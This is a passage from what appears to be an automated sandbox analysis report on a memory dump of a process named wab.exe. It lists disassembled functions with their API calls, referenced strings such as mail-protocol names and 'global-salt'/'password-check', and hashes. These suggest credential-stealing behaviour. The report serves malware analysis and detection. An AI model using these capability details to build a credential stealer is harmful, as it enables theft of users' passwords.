                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00408F72
                                                                                                                                                                                                            • Part of subcall function 0040900D: memset.MSVCRT ref: 00409031
                                                                                                                                                                                                            • Part of subcall function 0040900D: GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                                            • Part of subcall function 0040900D: _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00408F99
                                                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_00008ED5,00000000), ref: 00408FA9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                                          • String ID: caption$dialog_%d
                                                                                                                                                                                                          • API String ID: 2923679083-4161923789
                                                                                                                                                                                                          • Opcode ID: 000f1f906e92f5b03bb8d936c1600f8ee9725489ffd6e52dafee9c1c18951f52
                                                                                                                                                                                                          • Instruction ID: 5193b431d0dc7ecedf7a364b2ddef3fe6b5aec68a3d00ff581056cac6fb231a4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 000f1f906e92f5b03bb8d936c1600f8ee9725489ffd6e52dafee9c1c18951f52
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0BB745043487FFB129BA0DD06FC97AA8AB08747F0000A6BB44F11E2DBF899908B5E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00425FE6 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • cannot release savepoint - SQL statements in progress, xrefs: 004260EE
                                                                                                                                                                                                          • no such savepoint: %s, xrefs: 004260D0
                                                                                                                                                                                                          • unknown error, xrefs: 00426E65
                                                                                                                                                                                                          • abort due to ROLLBACK, xrefs: 00427E1B
                                                                                                                                                                                                          • cannot open savepoint - SQL statements in progress, xrefs: 00426002
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                                          • API String ID: 3510742995-3035234601
                                                                                                                                                                                                          • Opcode ID: f891372fe87baf48bda125dec3b2232890a750ac063dfed77912f4c4cabfec4f
                                                                                                                                                                                                          • Instruction ID: 1b592f7810eb55fdfd9c77514c161e0aeb834189807bd0e5c0ad66af0c508e0f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f891372fe87baf48bda125dec3b2232890a750ac063dfed77912f4c4cabfec4f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CC15B70A04625DFDB18CFA9E485BA9BBB1FF08304F5540AFE405A7392D738A851CF99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00441E91 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00441F4B
                                                                                                                                                                                                            • Part of subcall function 00441A6C: memcmp.MSVCRT ref: 00441AB5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmpmemcpy
                                                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                          • API String ID: 1784268899-4153596280
                                                                                                                                                                                                          • Opcode ID: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
                                                                                                                                                                                                          • Instruction ID: db602eaa8e833254b0c0c9be43f42c24c685b457dfa8f14c56b0ec28138b2128
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5091E2B1900700AFE730AF25C981A9EBBE5AB44304F14492FF14697392C7B9A985CB59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040FB27 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040F7DE,00000000,?), ref: 0040FB5E
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FBBB
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FBCD
                                                                                                                                                                                                            • Part of subcall function 0040FA44: _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FCB4
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040FCD9
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,0040F7DE,?), ref: 0040FD23
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3974772901-0
                                                                                                                                                                                                          • Opcode ID: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
                                                                                                                                                                                                          • Instruction ID: 4cd0dab2c11de29b1205cc267bdcfe4bbed2ca853fb67bca61950d18440e6937
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79511EB590021CABDB60DF95DD85ADEBBB8FF44305F1000BAE609A2281D7759E84CF69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00443546 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
                                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
                                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
                                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
                                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913
                                                                                                                                                                                                          • strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                                            • Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
                                                                                                                                                                                                            • Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 577244452-0
                                                                                                                                                                                                          • Opcode ID: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
                                                                                                                                                                                                          • Instruction ID: ed198900897cbedb477538fc3de06edee324e7a25cf08c3aedaf46951cf6a217
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14318672804219AFEF21EF65C8819DEBBB5EF45314F5480AAF108A3200CB396F84DF49
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404469 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004044FA
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                          • String ID: imap$pop3$smtp
                                                                                                                                                                                                          • API String ID: 2025310588-821077329
                                                                                                                                                                                                          • Opcode ID: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                                                                          • Instruction ID: ee17be80c36da3591ff53c386c7625c128025028662cc5e87d89578f4f8b6d75
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C42196B25046189BEB51DB15CD417DAB3FCEF90304F10006BE79AB7181DB787B498B59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040BD68 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BD88
                                                                                                                                                                                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                            • Part of subcall function 00407446: memset.MSVCRT ref: 00407466
                                                                                                                                                                                                            • Part of subcall function 00407446: sprintf.MSVCRT ref: 00407493
                                                                                                                                                                                                            • Part of subcall function 00407446: strlen.MSVCRT ref: 0040749F
                                                                                                                                                                                                            • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074B4
                                                                                                                                                                                                            • Part of subcall function 00407446: strlen.MSVCRT ref: 004074C2
                                                                                                                                                                                                            • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074D2
                                                                                                                                                                                                            • Part of subcall function 00407279: _mbscpy.MSVCRT ref: 004072DF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                          • API String ID: 2726666094-3614832568
                                                                                                                                                                                                          • Opcode ID: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                                                                          • Instruction ID: 9cc38d581f61d2a6594629c27ef9ad5a8c62d4d42b688fbaa09f609bba3e4d8d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0121FBB1C002599ADB40EFA5D981BDDBBB4AB08308F10517EF548B6281DB382A45CB9E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403A53 Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403A78
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403A91
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00403AD9
                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1786725549-0
                                                                                                                                                                                                          • Opcode ID: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                                                                          • Instruction ID: 3c11530c7ff43e2cab0ee1a3c4b7d34204fc8064c5823527b9b114d7af9e1f20
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50112DBA80412CBFFB10AB94DC85EEBB3ADEF09355F0001A6B715D2092D6359F548B78
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040BE9E Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040BEB8
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BECA
                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,00446634,00000000,?), ref: 0040BEEC
                                                                                                                                                                                                          • OpenClipboard.USER32(?), ref: 0040BF0C
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040BF25
                                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040BF42
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2014771361-0
                                                                                                                                                                                                          • Opcode ID: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
                                                                                                                                                                                                          • Instruction ID: 907fbb9bc954c15d9eb0ad6f98a85717611d4d669dd49ad048df0fde8b6b2f4b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B11A1B6900218ABDF20AB61DC49FDB77BCAB11701F0000B6B685E2092DBB499C48F68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406113 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcmp.MSVCRT ref: 00406129
                                                                                                                                                                                                            • Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
                                                                                                                                                                                                            • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
                                                                                                                                                                                                            • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9
                                                                                                                                                                                                          • memcmp.MSVCRT ref: 00406154
                                                                                                                                                                                                          • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406199
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                          • String ID: global-salt$password-check
                                                                                                                                                                                                          • API String ID: 231171946-3927197501
                                                                                                                                                                                                          • Opcode ID: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                                                                          • Instruction ID: 655c6eb068c7835b63414ef3c9938ae25085d91347c247b77763f6b5778615a8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E301D8B954070466FF202A628C42B8B37585F51758F024137FD067D2D3E37E87748A4E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00442960 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
                                                                                                                                                                                                          • Instruction ID: 5b630ca211e00ee6ab232d4f5fe81ba50f7f923f282134244f429d4b925a3085
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7501A272E0AD31A7E1257A76554135BE3686F04B29F05024FB904772428B6C7C5445DE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401693 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004016A2
                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004016B0
                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000014), ref: 004016BC
                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 004016D6
                                                                                                                                                                                                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 004016F2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 19018683-0
                                                                                                                                                                                                          • Opcode ID: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                                                                          • Instruction ID: 724a62348f30ed3062fc78c586e299175c66965872e24402369681ac2eeab922
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0701FB76900619AFDF04DFA8DC499FE7BBDFB45301F00046AEA11AB295DAB1A914CF90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040C319 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 0040C352
                                                                                                                                                                                                          • SetFocus.USER32(?,?,?), ref: 0040C3F8
                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                                                                          • String ID: XgD$rY@
                                                                                                                                                                                                          • API String ID: 3502187192-1347721759
                                                                                                                                                                                                          • Opcode ID: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                                                                          • Instruction ID: f774ea8d8eb1800fd2ad86f321479c1d669f6cdc6fcff53b53818c93aeeaee42
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F518630A04701DBCB34BB658885D9AB3E0BF51724F44C63FF4656B2E2C779A9818B8D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004062D9 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00406376
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406389
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040639C
                                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
                                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
                                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
                                                                                                                                                                                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
                                                                                                                                                                                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004063E0
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004063F3
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406420
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406435
                                                                                                                                                                                                            • Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                          • Opcode ID: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                                          • Instruction ID: a962c966a65fcbb98db0a5903e2df7d2d9caef1a51b72161af640e80cc8fe1a9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 744140B290050DBEEB51DAE8CC41EEFBB7CAB4C704F004476F704F6051E635AA598BA6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00443E22 Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443E43
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443E5C
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443E70
                                                                                                                                                                                                            • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00443E8C
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443EB1
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443EC7
                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443F07
                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset$strlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2142929671-0
                                                                                                                                                                                                          • Opcode ID: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                                          • Instruction ID: 7aa756fa7cbdb75c5c05895f31091f080fe59031f56f6a961c38bdf577465876
